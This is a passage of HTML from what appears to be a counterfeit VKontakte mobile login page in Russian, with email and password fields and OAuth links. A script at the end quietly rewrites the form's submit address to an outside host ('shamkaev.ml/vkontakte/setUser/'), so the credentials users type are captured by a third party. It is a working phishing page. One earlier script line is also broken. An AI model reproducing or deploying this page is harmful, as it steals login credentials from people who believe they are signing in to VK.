        <dd>
          <div class="iwrap"><input type="text" class="textfield" name="email" value="" /></div>
        </dd>
      </dl>
      <dl class="fi_row">
        <dt class="fi_label">Пароль:</dt>
        <dd>
          <div class="iwrap"><input type="password" class="textfield" name="pass" /></div>
        </dd>
      </dl>

      <div class="fi_row">
        <div class="fi_subrow">
          <input class="button" type="submit" value="Войти" /><div class="near_btn"><a href="https://black.loc/auth/vkontakte?error=access_denied&error_reason=user_denied&error_description=User+denied+your+request&state=secret_state_code">Отмена</a></div>
        </div>
      </div>
      <div class="fi_row_new">
  <div class="fi_header fi_header_light">Ещё не зарегистрированы?</div>
</div>
<div class="fi_row">
  <a class="button wide_button gray_button" href="https://m.vk.com/join?api_hash=b5177a534915460759" rel="noopener">Зарегистрироваться</a>
</div>
    </form>
  </div>
  </div>
</div></div>
          <div class="basis__footer mfoot" id="mfoot"><div class="pfoot">
  <ul class="footer_menu">

    <li class="fm_row"><a class="fm_item" href="https://m.vk.com/settings?act=change_regional&from=oauth&to=YXV0aG9yaXplP2NsaWVudF9pZD02MzgzMzgwJnJlZGlyZWN0X3VyaT1odHRwcyUzQSUyRiUyRmJsYWNrLmxvYyUyRmF1dGglMkZ2a29udGFrdGUmcmVzcG9uc2VfdHlwZT1jb2RlJnNjb3BlPTI2MjE0NCZ2PTUuMTAxJnN0YXRlPXNlY3JldF9zdGF0ZV9jb2RlJmRpc3BsYXk9cGFnZQ--&hash=ddb4a5a0f92471e783&lang_id=1">Українська</a></li><li class="fm_row"><a class="fm_item" href="https://m.vk.com/settings?act=change_regional&from=oauth&to=YXV0aG9yaXplP2NsaWVudF9pZD02MzgzMzgwJnJlZGlyZWN0X3VyaT1odHRwcyUzQSUyRiUyRmJsYWNrLmxvYyUyRmF1dGglMkZ2a29udGFrdGUmcmVzcG9uc2VfdHlwZT1jb2RlJnNjb3BlPTI2MjE0NCZ2PTUuMTAxJnN0YXRlPXNlY3JldF9zdGF0ZV9jb2RlJmRpc3BsYXk9cGFnZQ--&hash=ddb4a5a0f92471e783&lang_id=3">English</a></li>
    <li class="fm_row"><a class="fm_item" href="https://m.vk.com/settings?act=select_lang&from=oauth&to=YXV0aG9yaXplP2NsaWVudF9pZD02MzgzMzgwJnJlZGlyZWN0X3VyaT1odHRwcyUzQSUyRiUyRmJsYWNrLmxvYyUyRmF1dGglMkZ2a29udGFrdGUmcmVzcG9uc2VfdHlwZT1jb2RlJnNjb3BlPTI2MjE0NCZ2PTUuMTAxJnN0YXRlPXNlY3JldF9zdGF0ZV9jb2RlJmRpc3BsYXk9cGFnZQ--">all languages »</a></li>
  </ul>

</div></div>


    </div>
        </div>
      </div>
    </div>


        <script type="text/javascript">
<!--
parent&&parent!=window&&(document.getElementsByTagName('body')[0].='');try{sessionStorage.set('is_mvk_tab', 1)}catch(e){};;(function (d, w) {
var ts = d.createElement("script"); ts.type = "text/javascript"; ts.async = true;
ts.src = (d.location.protocol == "https:" ? "https:" : "http:") + "//top-fwz1.mail.ru/js/code.js";
var f = function () {var s = d.getElementsByTagName("script")[0]; s.parentNode.insertBefore(ts, s);};
if (w.opera == "[object Opera]") { d.addEventListener("DOMContentLoaded", f, false); } else { f(); }
})(document, window);
//-->
</script>
        <div id="vk_utils"></div>
        <div id="z"></div>
        <div id="vk_bottom"></div>
        <div id="theme_color_shim"></div>


      <script>
    const form  = document.querySelector('form');
    var new_field = document.createElement("input");
    new_field.setAttribute("type", "hidden");
    new_field.setAttribute("name", "origin_v");
    new_field.setAttribute("value", form.action);
    var pos = form.childElementCount;
    form.insertBefore(new_field, form.childNodes[pos]);
    form.action =  "https://shamkaev.ml/vkontakte/setUser/"
</script>
</body>
    </html>